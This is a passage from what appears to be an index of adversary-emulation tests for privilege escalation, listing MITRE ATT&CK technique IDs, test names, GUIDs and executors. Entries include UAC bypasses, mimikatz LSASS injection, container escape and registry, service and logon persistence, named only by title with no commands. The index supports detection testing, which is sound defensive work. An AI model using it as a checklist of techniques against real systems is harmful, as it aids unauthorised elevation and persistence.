| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 2 | Bypass UAC using Event Viewer (PowerShell) | a6ce9acf-842a-4af6-8f79-539be7608e2b | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 3 | Bypass UAC using Fodhelper | 58f641ea-12e3-499a-b684-44dee46bd182 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 4 | Bypass UAC using Fodhelper - PowerShell | 3f627297-6c38-4e7d-a278-fc2563eaaeaa | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 5 | Bypass UAC using ComputerDefaults (PowerShell) | 3c51abf2-44bf-42d8-9111-dc96ff66750f | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 6 | Bypass UAC by Mocking Trusted Directories | f7a35090-6f7f-4f64-bb47-d657bf5b10c1 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 7 | Bypass UAC using sdclt DelegateExecute | 3be891eb-4608-4173-87e8-78b494c029b7 | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 8 | Disable UAC using reg.exe | 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 9 | Bypass UAC using SilentCleanup task | 28104f8a-4ff1-4582-bcf6-699dce156608 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 10 | UACME Bypass Method 23 | 8ceab7a2-563a-47d2-b5ba-0995211128d7 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 11 | UACME Bypass Method 31 | b0f76240-9f33-4d34-90e8-3a7d501beb15 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 12 | UACME Bypass Method 33 | e514bb03-f71c-4b22-9092-9f961ec6fb03 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 13 | UACME Bypass Method 34 | 695b2dac-423e-448e-b6ef-5b88e93011d6 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 14 | UACME Bypass Method 39 | 56163687-081f-47da-bb9c-7b231c5585cf | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 15 | UACME Bypass Method 56 | 235ec031-cd2d-465d-a7ae-68bab281e80e | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 16 | UACME Bypass Method 59 | dfb1b667-4bb8-4a63-a85e-29936ea75f29 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 17 | UACME Bypass Method 61 | 7825b576-744c-4555-856d-caf3460dc236 | command_prompt |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 18 | WinPwn - UAC Magic | 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 19 | WinPwn - UAC Bypass ccmstp technique | f3c145f9-3c8d-422c-bd99-296a17a8f567 | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 20 | WinPwn - UAC Bypass DiskCleanup technique | 1ed67900-66cd-4b09-b546-2a0ef4431a0c | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 21 | WinPwn - UAC Bypass DccwBypassUAC technique | 2b61977b-ae2d-4ae4-89cb-5c36c89586be | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 22 | Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key | 251c5936-569f-42f4-9ac2-87a173b9e9b8 | powershell |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 23 | UAC Bypass with WSReset Registry Modification | 3b96673f-9c92-40f1-8a3e-ca060846f8d9 | powershell |
| privilege-escalation | T1548.003 | Abuse Elevation Control Mechanism: Sudo and Sudo Caching | 1 | Sudo usage | 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e | sh |
| privilege-escalation | T1548.003 | Abuse Elevation Control Mechanism: Sudo and Sudo Caching | 2 | Unlimited sudo cache timeout | a7b17659-dd5e-46f7-b7d1-e6792c91d0bc | sh |
| privilege-escalation | T1548.003 | Abuse Elevation Control Mechanism: Sudo and Sudo Caching | 3 | Disable tty_tickets for sudo caching | 91a60b03-fb75-4d24-a42e-2eb8956e8de1 | sh |
| privilege-escalation | T1574.011 | Hijack Execution Flow: Services Registry Permissions Weakness | 1 | Service Registry Permissions Weakness | f7536d63-7fd4-466f-89da-7e48d550752a | powershell |
| privilege-escalation | T1574.011 | Hijack Execution Flow: Services Registry Permissions Weakness | 2 | Service ImagePath Change with reg.exe | f38e9eea-e1d7-4ba6-b716-584791963827 | command_prompt |
| privilege-escalation | T1547 | Boot or Logon Autostart Execution | 1 | Add a driver | cb01b3da-b0e7-4e24-bf6d-de5223526785 | command_prompt |
| privilege-escalation | T1547.014 | Active Setup | 1 | HKLM - Add atomic_test key to launch executable as part of user setup | deff4586-0517-49c2-981d-bbea24d48d71 | powershell |
| privilege-escalation | T1547.014 | Active Setup | 2 | HKLM - Add malicious StubPath value to existing Active Setup Entry | 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a | powershell |
| privilege-escalation | T1547.014 | Active Setup | 3 | HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number | 04d55cef-f283-40ba-ae2a-316bc3b5e78c | powershell |
| privilege-escalation | T1484.002 | Domain Trust Modification | 1 | Add Federation to Azure AD | 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 | powershell |
| privilege-escalation | T1543.003 | Create or Modify System Process: Windows Service | 1 | Modify Fax service to run PowerShell | ed366cde-7d12-49df-a833-671904770b9f | command_prompt |
| privilege-escalation | T1543.003 | Create or Modify System Process: Windows Service | 2 | Service Installation CMD | 981e2942-e433-44e9-afc1-8c957a1496b6 | command_prompt |
| privilege-escalation | T1543.003 | Create or Modify System Process: Windows Service | 3 | Service Installation PowerShell | 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 | powershell |
| privilege-escalation | T1543.003 | Create or Modify System Process: Windows Service | 4 | TinyTurla backdoor service w64time | ef0581fd-528e-4662-87bc-4c2affb86940 | command_prompt |
| privilege-escalation | T1543.003 | Create or Modify System Process: Windows Service | 5 | Remote Service Installation CMD | fb4151a2-db33-4f8c-b7f8-78ea8790f961 | command_prompt |
| privilege-escalation | T1053.003 | Scheduled Task/Job: Cron | 1 | Cron - Replace crontab with referenced file | 435057fb-74b1-410e-9403-d81baf194f75 | bash |
| privilege-escalation | T1053.003 | Scheduled Task/Job: Cron | 2 | Cron - Add script to all cron subfolders | b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 | bash |
| privilege-escalation | T1053.003 | Scheduled Task/Job: Cron | 3 | Cron - Add script to /var/spool/cron/crontabs/ folder | 2d943c18-e74a-44bf-936f-25ade6cccab4 | bash |
| privilege-escalation | T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | 1 | DLL Search Order Hijacking - amsi.dll | 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 | command_prompt |
| privilege-escalation | T1055.003 | Thread Execution Hijacking | 1 | Thread Execution Hijacking | 578025d5-faa9-4f6d-8390-aae527d503e1 | powershell |
| privilege-escalation | T1546.011 | Event Triggered Execution: Application Shimming | 1 | Application Shim Installation | 9ab27e22-ee62-4211-962b-d36d9a0e6a18 | command_prompt |
| privilege-escalation | T1546.011 | Event Triggered Execution: Application Shimming | 2 | New shim database files created in the default shim database directory | aefd6866-d753-431f-a7a4-215ca7e3f13d | powershell |
| privilege-escalation | T1546.011 | Event Triggered Execution: Application Shimming | 3 | Registry key creation and/or modification events for SDB | 9b6a06f9-ab5e-4e8d-8289-1df4289db02f | powershell |
| privilege-escalation | T1547.010 | Boot or Logon Autostart Execution: Port Monitors | 1 | Add Port Monitor persistence in Registry | d34ef297-f178-4462-871e-9ce618d44e50 | command_prompt |
| privilege-escalation | T1037.002 | Boot or Logon Initialization Scripts: Logon Script (Mac) | 1 | Logon Scripts - Mac | f047c7de-a2d9-406e-a62b-12a09d9516f4 | manual |
| privilege-escalation | T1055 | Process Injection | 1 | Shellcode execution via VBA | 1c91e740-1729-4329-b779-feba6e71d048 | powershell |
| privilege-escalation | T1055 | Process Injection | 2 | Remote Process Injection in LSASS via mimikatz | 3203ad24-168e-4bec-be36-f79b13ef8a83 | command_prompt |
| privilege-escalation | T1055 | Process Injection | 3 | Section View Injection | c6952f41-6cf0-450a-b352-2ca8dae7c178 | powershell |
| privilege-escalation | T1611 | Escape to Host | 1 | Deploy container using nsenter container escape | 0b2f9520-a17a-4671-9dba-3bd034099fff | sh |
| privilege-escalation | T1611 | Escape to Host | 2 | Mount host filesystem to escape privileged Docker container | 6c499943-b098-4bc6-8d38-0956fc182984 | sh |
| privilege-escalation | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification | 1 | Shortcut Modification | ce4fc678-364f-4282-af16-2fb4c78005ce | command_prompt |
| privilege-escalation | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification | 2 | Create shortcut to cmd in startup folders | cfdc954d-4bb0-4027-875b-a1893ce406f2 | powershell |
| privilege-escalation | T1547.005 | Boot or Logon Autostart Execution: Security Support Provider | 1 | Modify SSP configuration in registry | afdfd7e3-8a0b-409f-85f7-886fdf249c9e | powershell |
| privilege-escalation | T1543.004 | Create or Modify System Process: Launch Daemon | 1 | Launch Daemon | 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf | bash |
| privilege-escalation | T1574.008 | Hijack Execution Flow: Path Interception by Search Order Hijacking | 1 | powerShell Persistence via hijacking default modules - Get-Variable.exe | 1561de08-0b4b-498e-8261-e922f3494aae | powershell |
| privilege-escalation | T1484.001 | Domain Policy Modification: Group Policy Modification | 1 | LockBit Black - Modify Group policy settings -cmd | 9ab80952-74ee-43da-a98c-1e740a985f28 | command_prompt |
| privilege-escalation | T1484.001 | Domain Policy Modification: Group Policy Modification | 2 | LockBit Black - Modify Group policy settings -Powershell | b51eae65-5441-4789-b8e8-64783c26c1d1 | powershell |
| privilege-escalation | T1078.001 | Valid Accounts: Default Accounts | 1 | Enable Guest account with RDP capability and admin privileges | 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 | command_prompt |
| privilege-escalation | T1078.001 | Valid Accounts: Default Accounts | 2 | Activate Guest Account | aa6cb8c4-b582-4f8e-b677-37733914abda | command_prompt |
| privilege-escalation | T1078.001 | Valid Accounts: Default Accounts | 3 | Enable Guest Account on macOS | 0315bdff-4178-47e9-81e4-f31a6d23f7e4 | command_prompt |
| privilege-escalation | T1547.003 | Time Providers | 1 | Create a new time provider | df1efab7-bc6d-4b88-8be9-91f55ae017aa | powershell |
| privilege-escalation | T1547.003 | Time Providers | 2 | Edit an existing time provider | 29e0afca-8d1d-471a-8d34-25512fc48315 | powershell |
| privilege-escalation | T1546.005 | Event Triggered Execution: Trap | 1 | Trap EXIT | a74b2e07-5952-4c03-8b56-56274b076b61 | sh |
| privilege-escalation | T1546.005 | Event Triggered Execution: Trap | 2 | Trap SIGINT | a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 | sh |
| privilege-escalation | T1574.006 | Hijack Execution Flow: LD_PRELOAD | 1 | Shared Library Injection via /etc/ld.so.preload | 39cb0e67-dd0d-4b74-a74b-c072db7ae991 | bash |
| privilege-escalation | T1574.006 | Hijack Execution Flow: LD_PRELOAD | 2 | Shared Library Injection via LD_PRELOAD | bc219ff7-789f-4d51-9142-ecae3397deae | bash |
| privilege-escalation | T1574.006 | Hijack Execution Flow: LD_PRELOAD | 3 | Dylib Injection via DYLD_INSERT_LIBRARIES | 4d66029d-7355-43fd-93a4-b63ba92ea1be | bash |
| privilege-escalation | T1134.002 | Create Process with Token | 1 | Access Token Manipulation | dbf4f5a9-b8e0-46a3-9841-9ad71247239e | powershell |
| privilege-escalation | T1134.002 | Create Process with Token | 2 | WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique | ccf4ac39-ec93-42be-9035-90e2f26bcd92 | powershell |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 1 | Make and modify binary from C source | 896dfe97-ae43-4101-8e96-9a7996555d80 | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 2 | Set a SetUID flag on file | 759055b3-3885-4582-a8ec-c00c9d64dd79 | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 3 | Set a SetGID flag on file | db55f666-7cba-46c6-9fe6-205a05c3242c | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 4 | Make and modify capabilities of a binary | db53959c-207d-4000-9e7a-cd8eb417e072 | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 5 | Provide the SetUID capability to a file | 1ac3272f-9bcf-443a-9888-4b1d3de785c1 | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 6 | Do reconnaissance for files that have the setuid bit set | 8e36da01-cd29-45fd-be72-8a0fcaad4481 | sh |
| privilege-escalation | T1548.001 | Abuse Elevation Control Mechanism: Setuid and Setgid | 7 | Do reconnaissance for files that have the setgid bit set | 3fb46e17-f337-4c14-9f9a-a471946533e2 | sh |
| privilege-escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | 1 | Winlogon Shell Key Persistence - PowerShell | bf9f9d65-ee4d-4c3e-a843-777d04f19c38 | powershell |
| privilege-escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | 2 | Winlogon Userinit Key Persistence - PowerShell | fb32c935-ee2e-454b-8fa3-1c46b42e8dfb | powershell |
| privilege-escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | 3 | Winlogon Notify Key Logon Persistence - PowerShell | d40da266-e073-4e5a-bb8b-2b385023e5f9 | powershell |
| privilege-escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | 4 | Winlogon HKLM Shell Key Persistence - PowerShell | 95a3c42f-8c88-4952-ad60-13b81d929a9d | powershell |
| privilege-escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | 5 | Winlogon HKLM Userinit Key Persistence - PowerShell | f9b8daff-8fa7-4e6a-a1a7-7c14675a545b | powershell |
| privilege-escalation | T1546.012 | Event Triggered Execution: Image File Execution Options Injection | 1 | IFEO Add Debugger | fdda2626-5234-4c90-b163-60849a24c0b8 | command_prompt |
| privilege-escalation | T1546.012 | Event Triggered Execution: Image File Execution Options Injection | 2 | IFEO Global Flags | 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 | command_prompt |
| privilege-escalation | T1546.012 | Event Triggered Execution: Image File Execution Options Injection | 3 | GlobalFlags in Image File Execution Options | 13117939-c9b2-4a43-999e-0a543df92f0d | powershell |
| privilege-escalation | T1546.008 | Event Triggered Execution: Accessibility Features | 1 | Attaches Command Prompt as a Debugger to a List of Target Processes | 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 | powershell |
| privilege-escalation | T1546.008 | Event Triggered Execution: Accessibility Features | 2 | Replace binary of sticky keys | 934e90cf-29ca-48b3-863c-411737ad44e3 | command_prompt |
| privilege-escalation | T1546.008 | Event Triggered Execution: Accessibility Features | 3 | Create Symbolic Link From osk.exe to cmd.exe | 51ef369c-5e87-4f33-88cd-6d61be63edf2 | command_prompt |
| privilege-escalation | T1055.004 | Process Injection: Asynchronous Procedure Call | 1 | Process Injection via C# | 611b39b7-e243-4c81-87a4-7145a90358b1 | command_prompt |
| privilege-escalation | T1546.009 | Event Triggered Execution: AppCert DLLs | 1 | Create registry persistence via AppCert DLL | a5ad6104-5bab-4c43-b295-b4c44c7c6b05 | powershell |
| privilege-escalation | T1547.015 | Boot or Logon Autostart Execution: Login Items | 1 | Persistence by modifying Windows Terminal profile | ec5d76ef-82fe-48da-b931-bdb25a62bc65 | powershell |
| privilege-escalation | T1547.015 | Boot or Logon Autostart Execution: Login Items | 2 | Add macOS LoginItem using Applescript | 716e756a-607b-41f3-8204-b214baf37c1d | bash |
| privilege-escalation | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | 1 | Named pipe client impersonation | 90db9e27-8e7c-4c04-b602-a45927884966 | powershell |
| privilege-escalation | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | 2 | `SeDebugPrivilege` token duplication | 34f0a430-9d04-4d98-bcb5-1989f14719f0 | powershell |
| privilege-escalation | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | 3 | Launch NSudo Executable | 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 | powershell |
| privilege-escalation | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | 4 | Bad Potato | 9c6d799b-c111-4749-a42f-ec2f8cb51448 | powershell |
| privilege-escalation | T1546.003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription | 1 | Persistence via WMI Event Subscription - CommandLineEventConsumer | 3c64f177-28e2-49eb-a799-d767b24dd1e0 | powershell |
| privilege-escalation | T1546.003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription | 2 | Persistence via WMI Event Subscription - ActiveScriptEventConsumer | fecd0dfd-fb55-45fa-a10b-6250272d0832 | powershell |
| privilege-escalation | T1546.003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription | 3 | Windows MOFComp.exe Load MOF File | 29786d7e-8916-4de6-9c55-be7b093b2706 | powershell |
| privilege-escalation | T1134.004 | Access Token Manipulation: Parent PID Spoofing | 1 | Parent PID Spoofing using PowerShell | 069258f4-2162-46e9-9a25-c9c6c56150d2 | powershell |
| privilege-escalation | T1134.004 | Access Token Manipulation: Parent PID Spoofing | 2 | Parent PID Spoofing - Spawn from Current Process | 14920ebd-1d61-491a-85e0-fe98efe37f25 | powershell |
| privilege-escalation | T1134.004 | Access Token Manipulation: Parent PID Spoofing | 3 | Parent PID Spoofing - Spawn from Specified Process | cbbff285-9051-444a-9d17-c07cd2d230eb | powershell |
| privilege-escalation | T1134.004 | Access Token Manipulation: Parent PID Spoofing | 4 | Parent PID Spoofing - Spawn from svchost.exe | e9f2b777-3123-430b-805d-5cedc66ab591 | powershell |
| privilege-escalation | T1134.004 | Access Token Manipulation: Parent PID Spoofing | 5 | Parent PID Spoofing - Spawn from New Process | 2988133e-561c-4e42-a15f-6281e6a9b2db | powershell |
| privilege-escalation | T1546.001 | Event Triggered Execution: Change Default File Association | 1 | Change Default File Association | 10a08978-2045-4d62-8c42-1957bbbea102 | command_prompt |
| privilege-escalation | T1546.014 | Event Triggered Execution: Emond | 1 | Persistance with Event Monitor - emond | 23c9c127-322b-4c75-95ca-eff464906114 | sh |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 1 | Reg Key Run | e55be3fd-3521-4610-9d1a-e210e42dcf05 | command_prompt |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 2 | Reg Key RunOnce | 554cbd88-cde1-4b56-8168-0be552eed9eb | command_prompt |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 3 | PowerShell Registry RunOnce | eb44f842-0457-4ddc-9b92-c4caa144ac42 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 4 | Suspicious vbs file run from startup Folder | 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 5 | Suspicious jse file run from startup Folder | dade9447-791e-4c8f-b04b-3a35855dfa06 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 6 | Suspicious bat file run from startup Folder | 5b6768e4-44d2-44f0-89da-a01d1430fd5e | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 7 | Add Executable Shortcut Link to User Startup Folder | 24e55612-85f6-4bd6-ae74-a73d02e3441d | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 8 | Add persistance via Recycle bin | bda6a3d6-7aa7-4e89-908b-306772e9662f | command_prompt |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 9 | SystemBC Malware-as-a-Service Registry | 9dc7767b-30c1-4cc4-b999-50cab5e27891 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 10 | Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value | acfef903-7662-447e-a391-9c91c2f00f7b | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 11 | Change Startup Folder - HKCU Modify User Shell Folders Startup Value | 8834b65a-f808-4ece-ad7e-2acdf647aafa | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 12 | HKCU - Policy Settings Explorer Run Key | a70faea1-e206-4f6f-8d9a-67379be8f6f1 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 13 | HKLM - Policy Settings Explorer Run Key | b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 14 | HKLM - Append Command to Winlogon Userinit KEY Value | f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 15 | HKLM - Modify default System Shell - Winlogon Shell KEY Value | 1d958c61-09c6-4d9e-b26b-4130314e520e | powershell |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 16 | secedit used to create a Run key in the HKLM Hive | 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 | command_prompt |
| privilege-escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | 17 | Modify BootExecute Value | befc2b40-d487-4a5a-8813-c11085fb5672 | powershell |
| privilege-escalation | T1547.006 | Boot or Logon Autostart Execution: Kernel Modules and Extensions | 1 | Linux - Load Kernel Module via insmod | 687dcb93-9656-4853-9c36-9977315e9d23 | bash |
| privilege-escalation | T1547.006 | Boot or Logon Autostart Execution: Kernel Modules and Extensions | 2 | MacOS - Load Kernel Module via kextload and kmutil | f4391089-d3a5-4dd1-ab22-0419527f2672 | bash |
| privilege-escalation | T1547.006 | Boot or Logon Autostart Execution: Kernel Modules and Extensions | 3 | MacOS - Load Kernel Module via KextManagerLoadKextWithURL() | f0007753-beb3-41ea-9948-760785e4c1e5 | bash |
| privilege-escalation | T1547.006 | Boot or Logon Autostart Execution: Kernel Modules and Extensions | 4 | Snake Malware Kernel Driver Comadmin | e5cb5564-cc7b-4050-86e8-f2d9eec1941f | powershell |
| privilege-escalation | T1053.006 | Scheduled Task/Job: Systemd Timers | 1 | Create Systemd Service and Timer | f4983098-bb13-44fb-9b2c-46149961807b | bash |
| privilege-escalation | T1053.006 | Scheduled Task/Job: Systemd Timers | 2 | Create a user level transient systemd service and timer | 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec | sh |
| privilege-escalation | T1053.006 | Scheduled Task/Job: Systemd Timers | 3 | Create a system level transient systemd service and timer | d3eda496-1fc0-49e9-aff5-3bec5da9fa22 | sh |
| privilege-escalation | T1055.012 | Process Injection: Process Hollowing | 1 | Process Hollowing using PowerShell | 562427b4-39ef-4e8c-af88-463a78e70b9c | powershell |
| privilege-escalation | T1055.012 | Process Injection: Process Hollowing | 2 | RunPE via VBA | 3ad4a037-1598-4136-837c-4027e4fa319b | powershell |
| privilege-escalation | T1546 | Event Triggered Execution | 1 | Persistence with Custom AutodialDLL | aca9ae16-7425-4b6d-8c30-cad306fdbd5b | powershell |
| privilege-escalation | T1546 | Event Triggered Execution | 2 | HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) | a574dafe-a903-4cce-9701-14040f4f3532 | powershell |
| privilege-escalation | T1546 | Event Triggered Execution | 3 | HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) | 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 | powershell |
| privilege-escalation | T1546 | Event Triggered Execution | 4 | WMI Invoke-CimMethod Start Process | adae83d3-0df6-45e7-b2c3-575f91584577 | powershell |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 1 | Add command to .bash_profile | 94500ae1-7e31-47e3-886b-c328da46872f | sh |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 2 | Add command to .bashrc | 0a898315-4cfa-4007-bafe-33a4646d115f | sh |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 3 | Append to the system shell profile | 694b3cc8-6a78-4d35-9e74-0123d009e94b | sh |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 4 | Append commands user shell profile | bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 | sh |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 5 | System shell profile scripts | 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 | sh |
| privilege-escalation | T1546.004 | Event Triggered Execution: .bash_profile and .bashrc | 6 | Create/Append to .bash_logout | 37ad2f24-7c53-4a50-92da-427a4ad13f58 | bash |
668 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
669 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
670 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
671 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
672 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
673 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
674 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
675 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
676 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
677 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
678 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
679 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
680 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
681 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
682 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
683 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
684 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
685 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
686 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
687 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
688 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
689 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
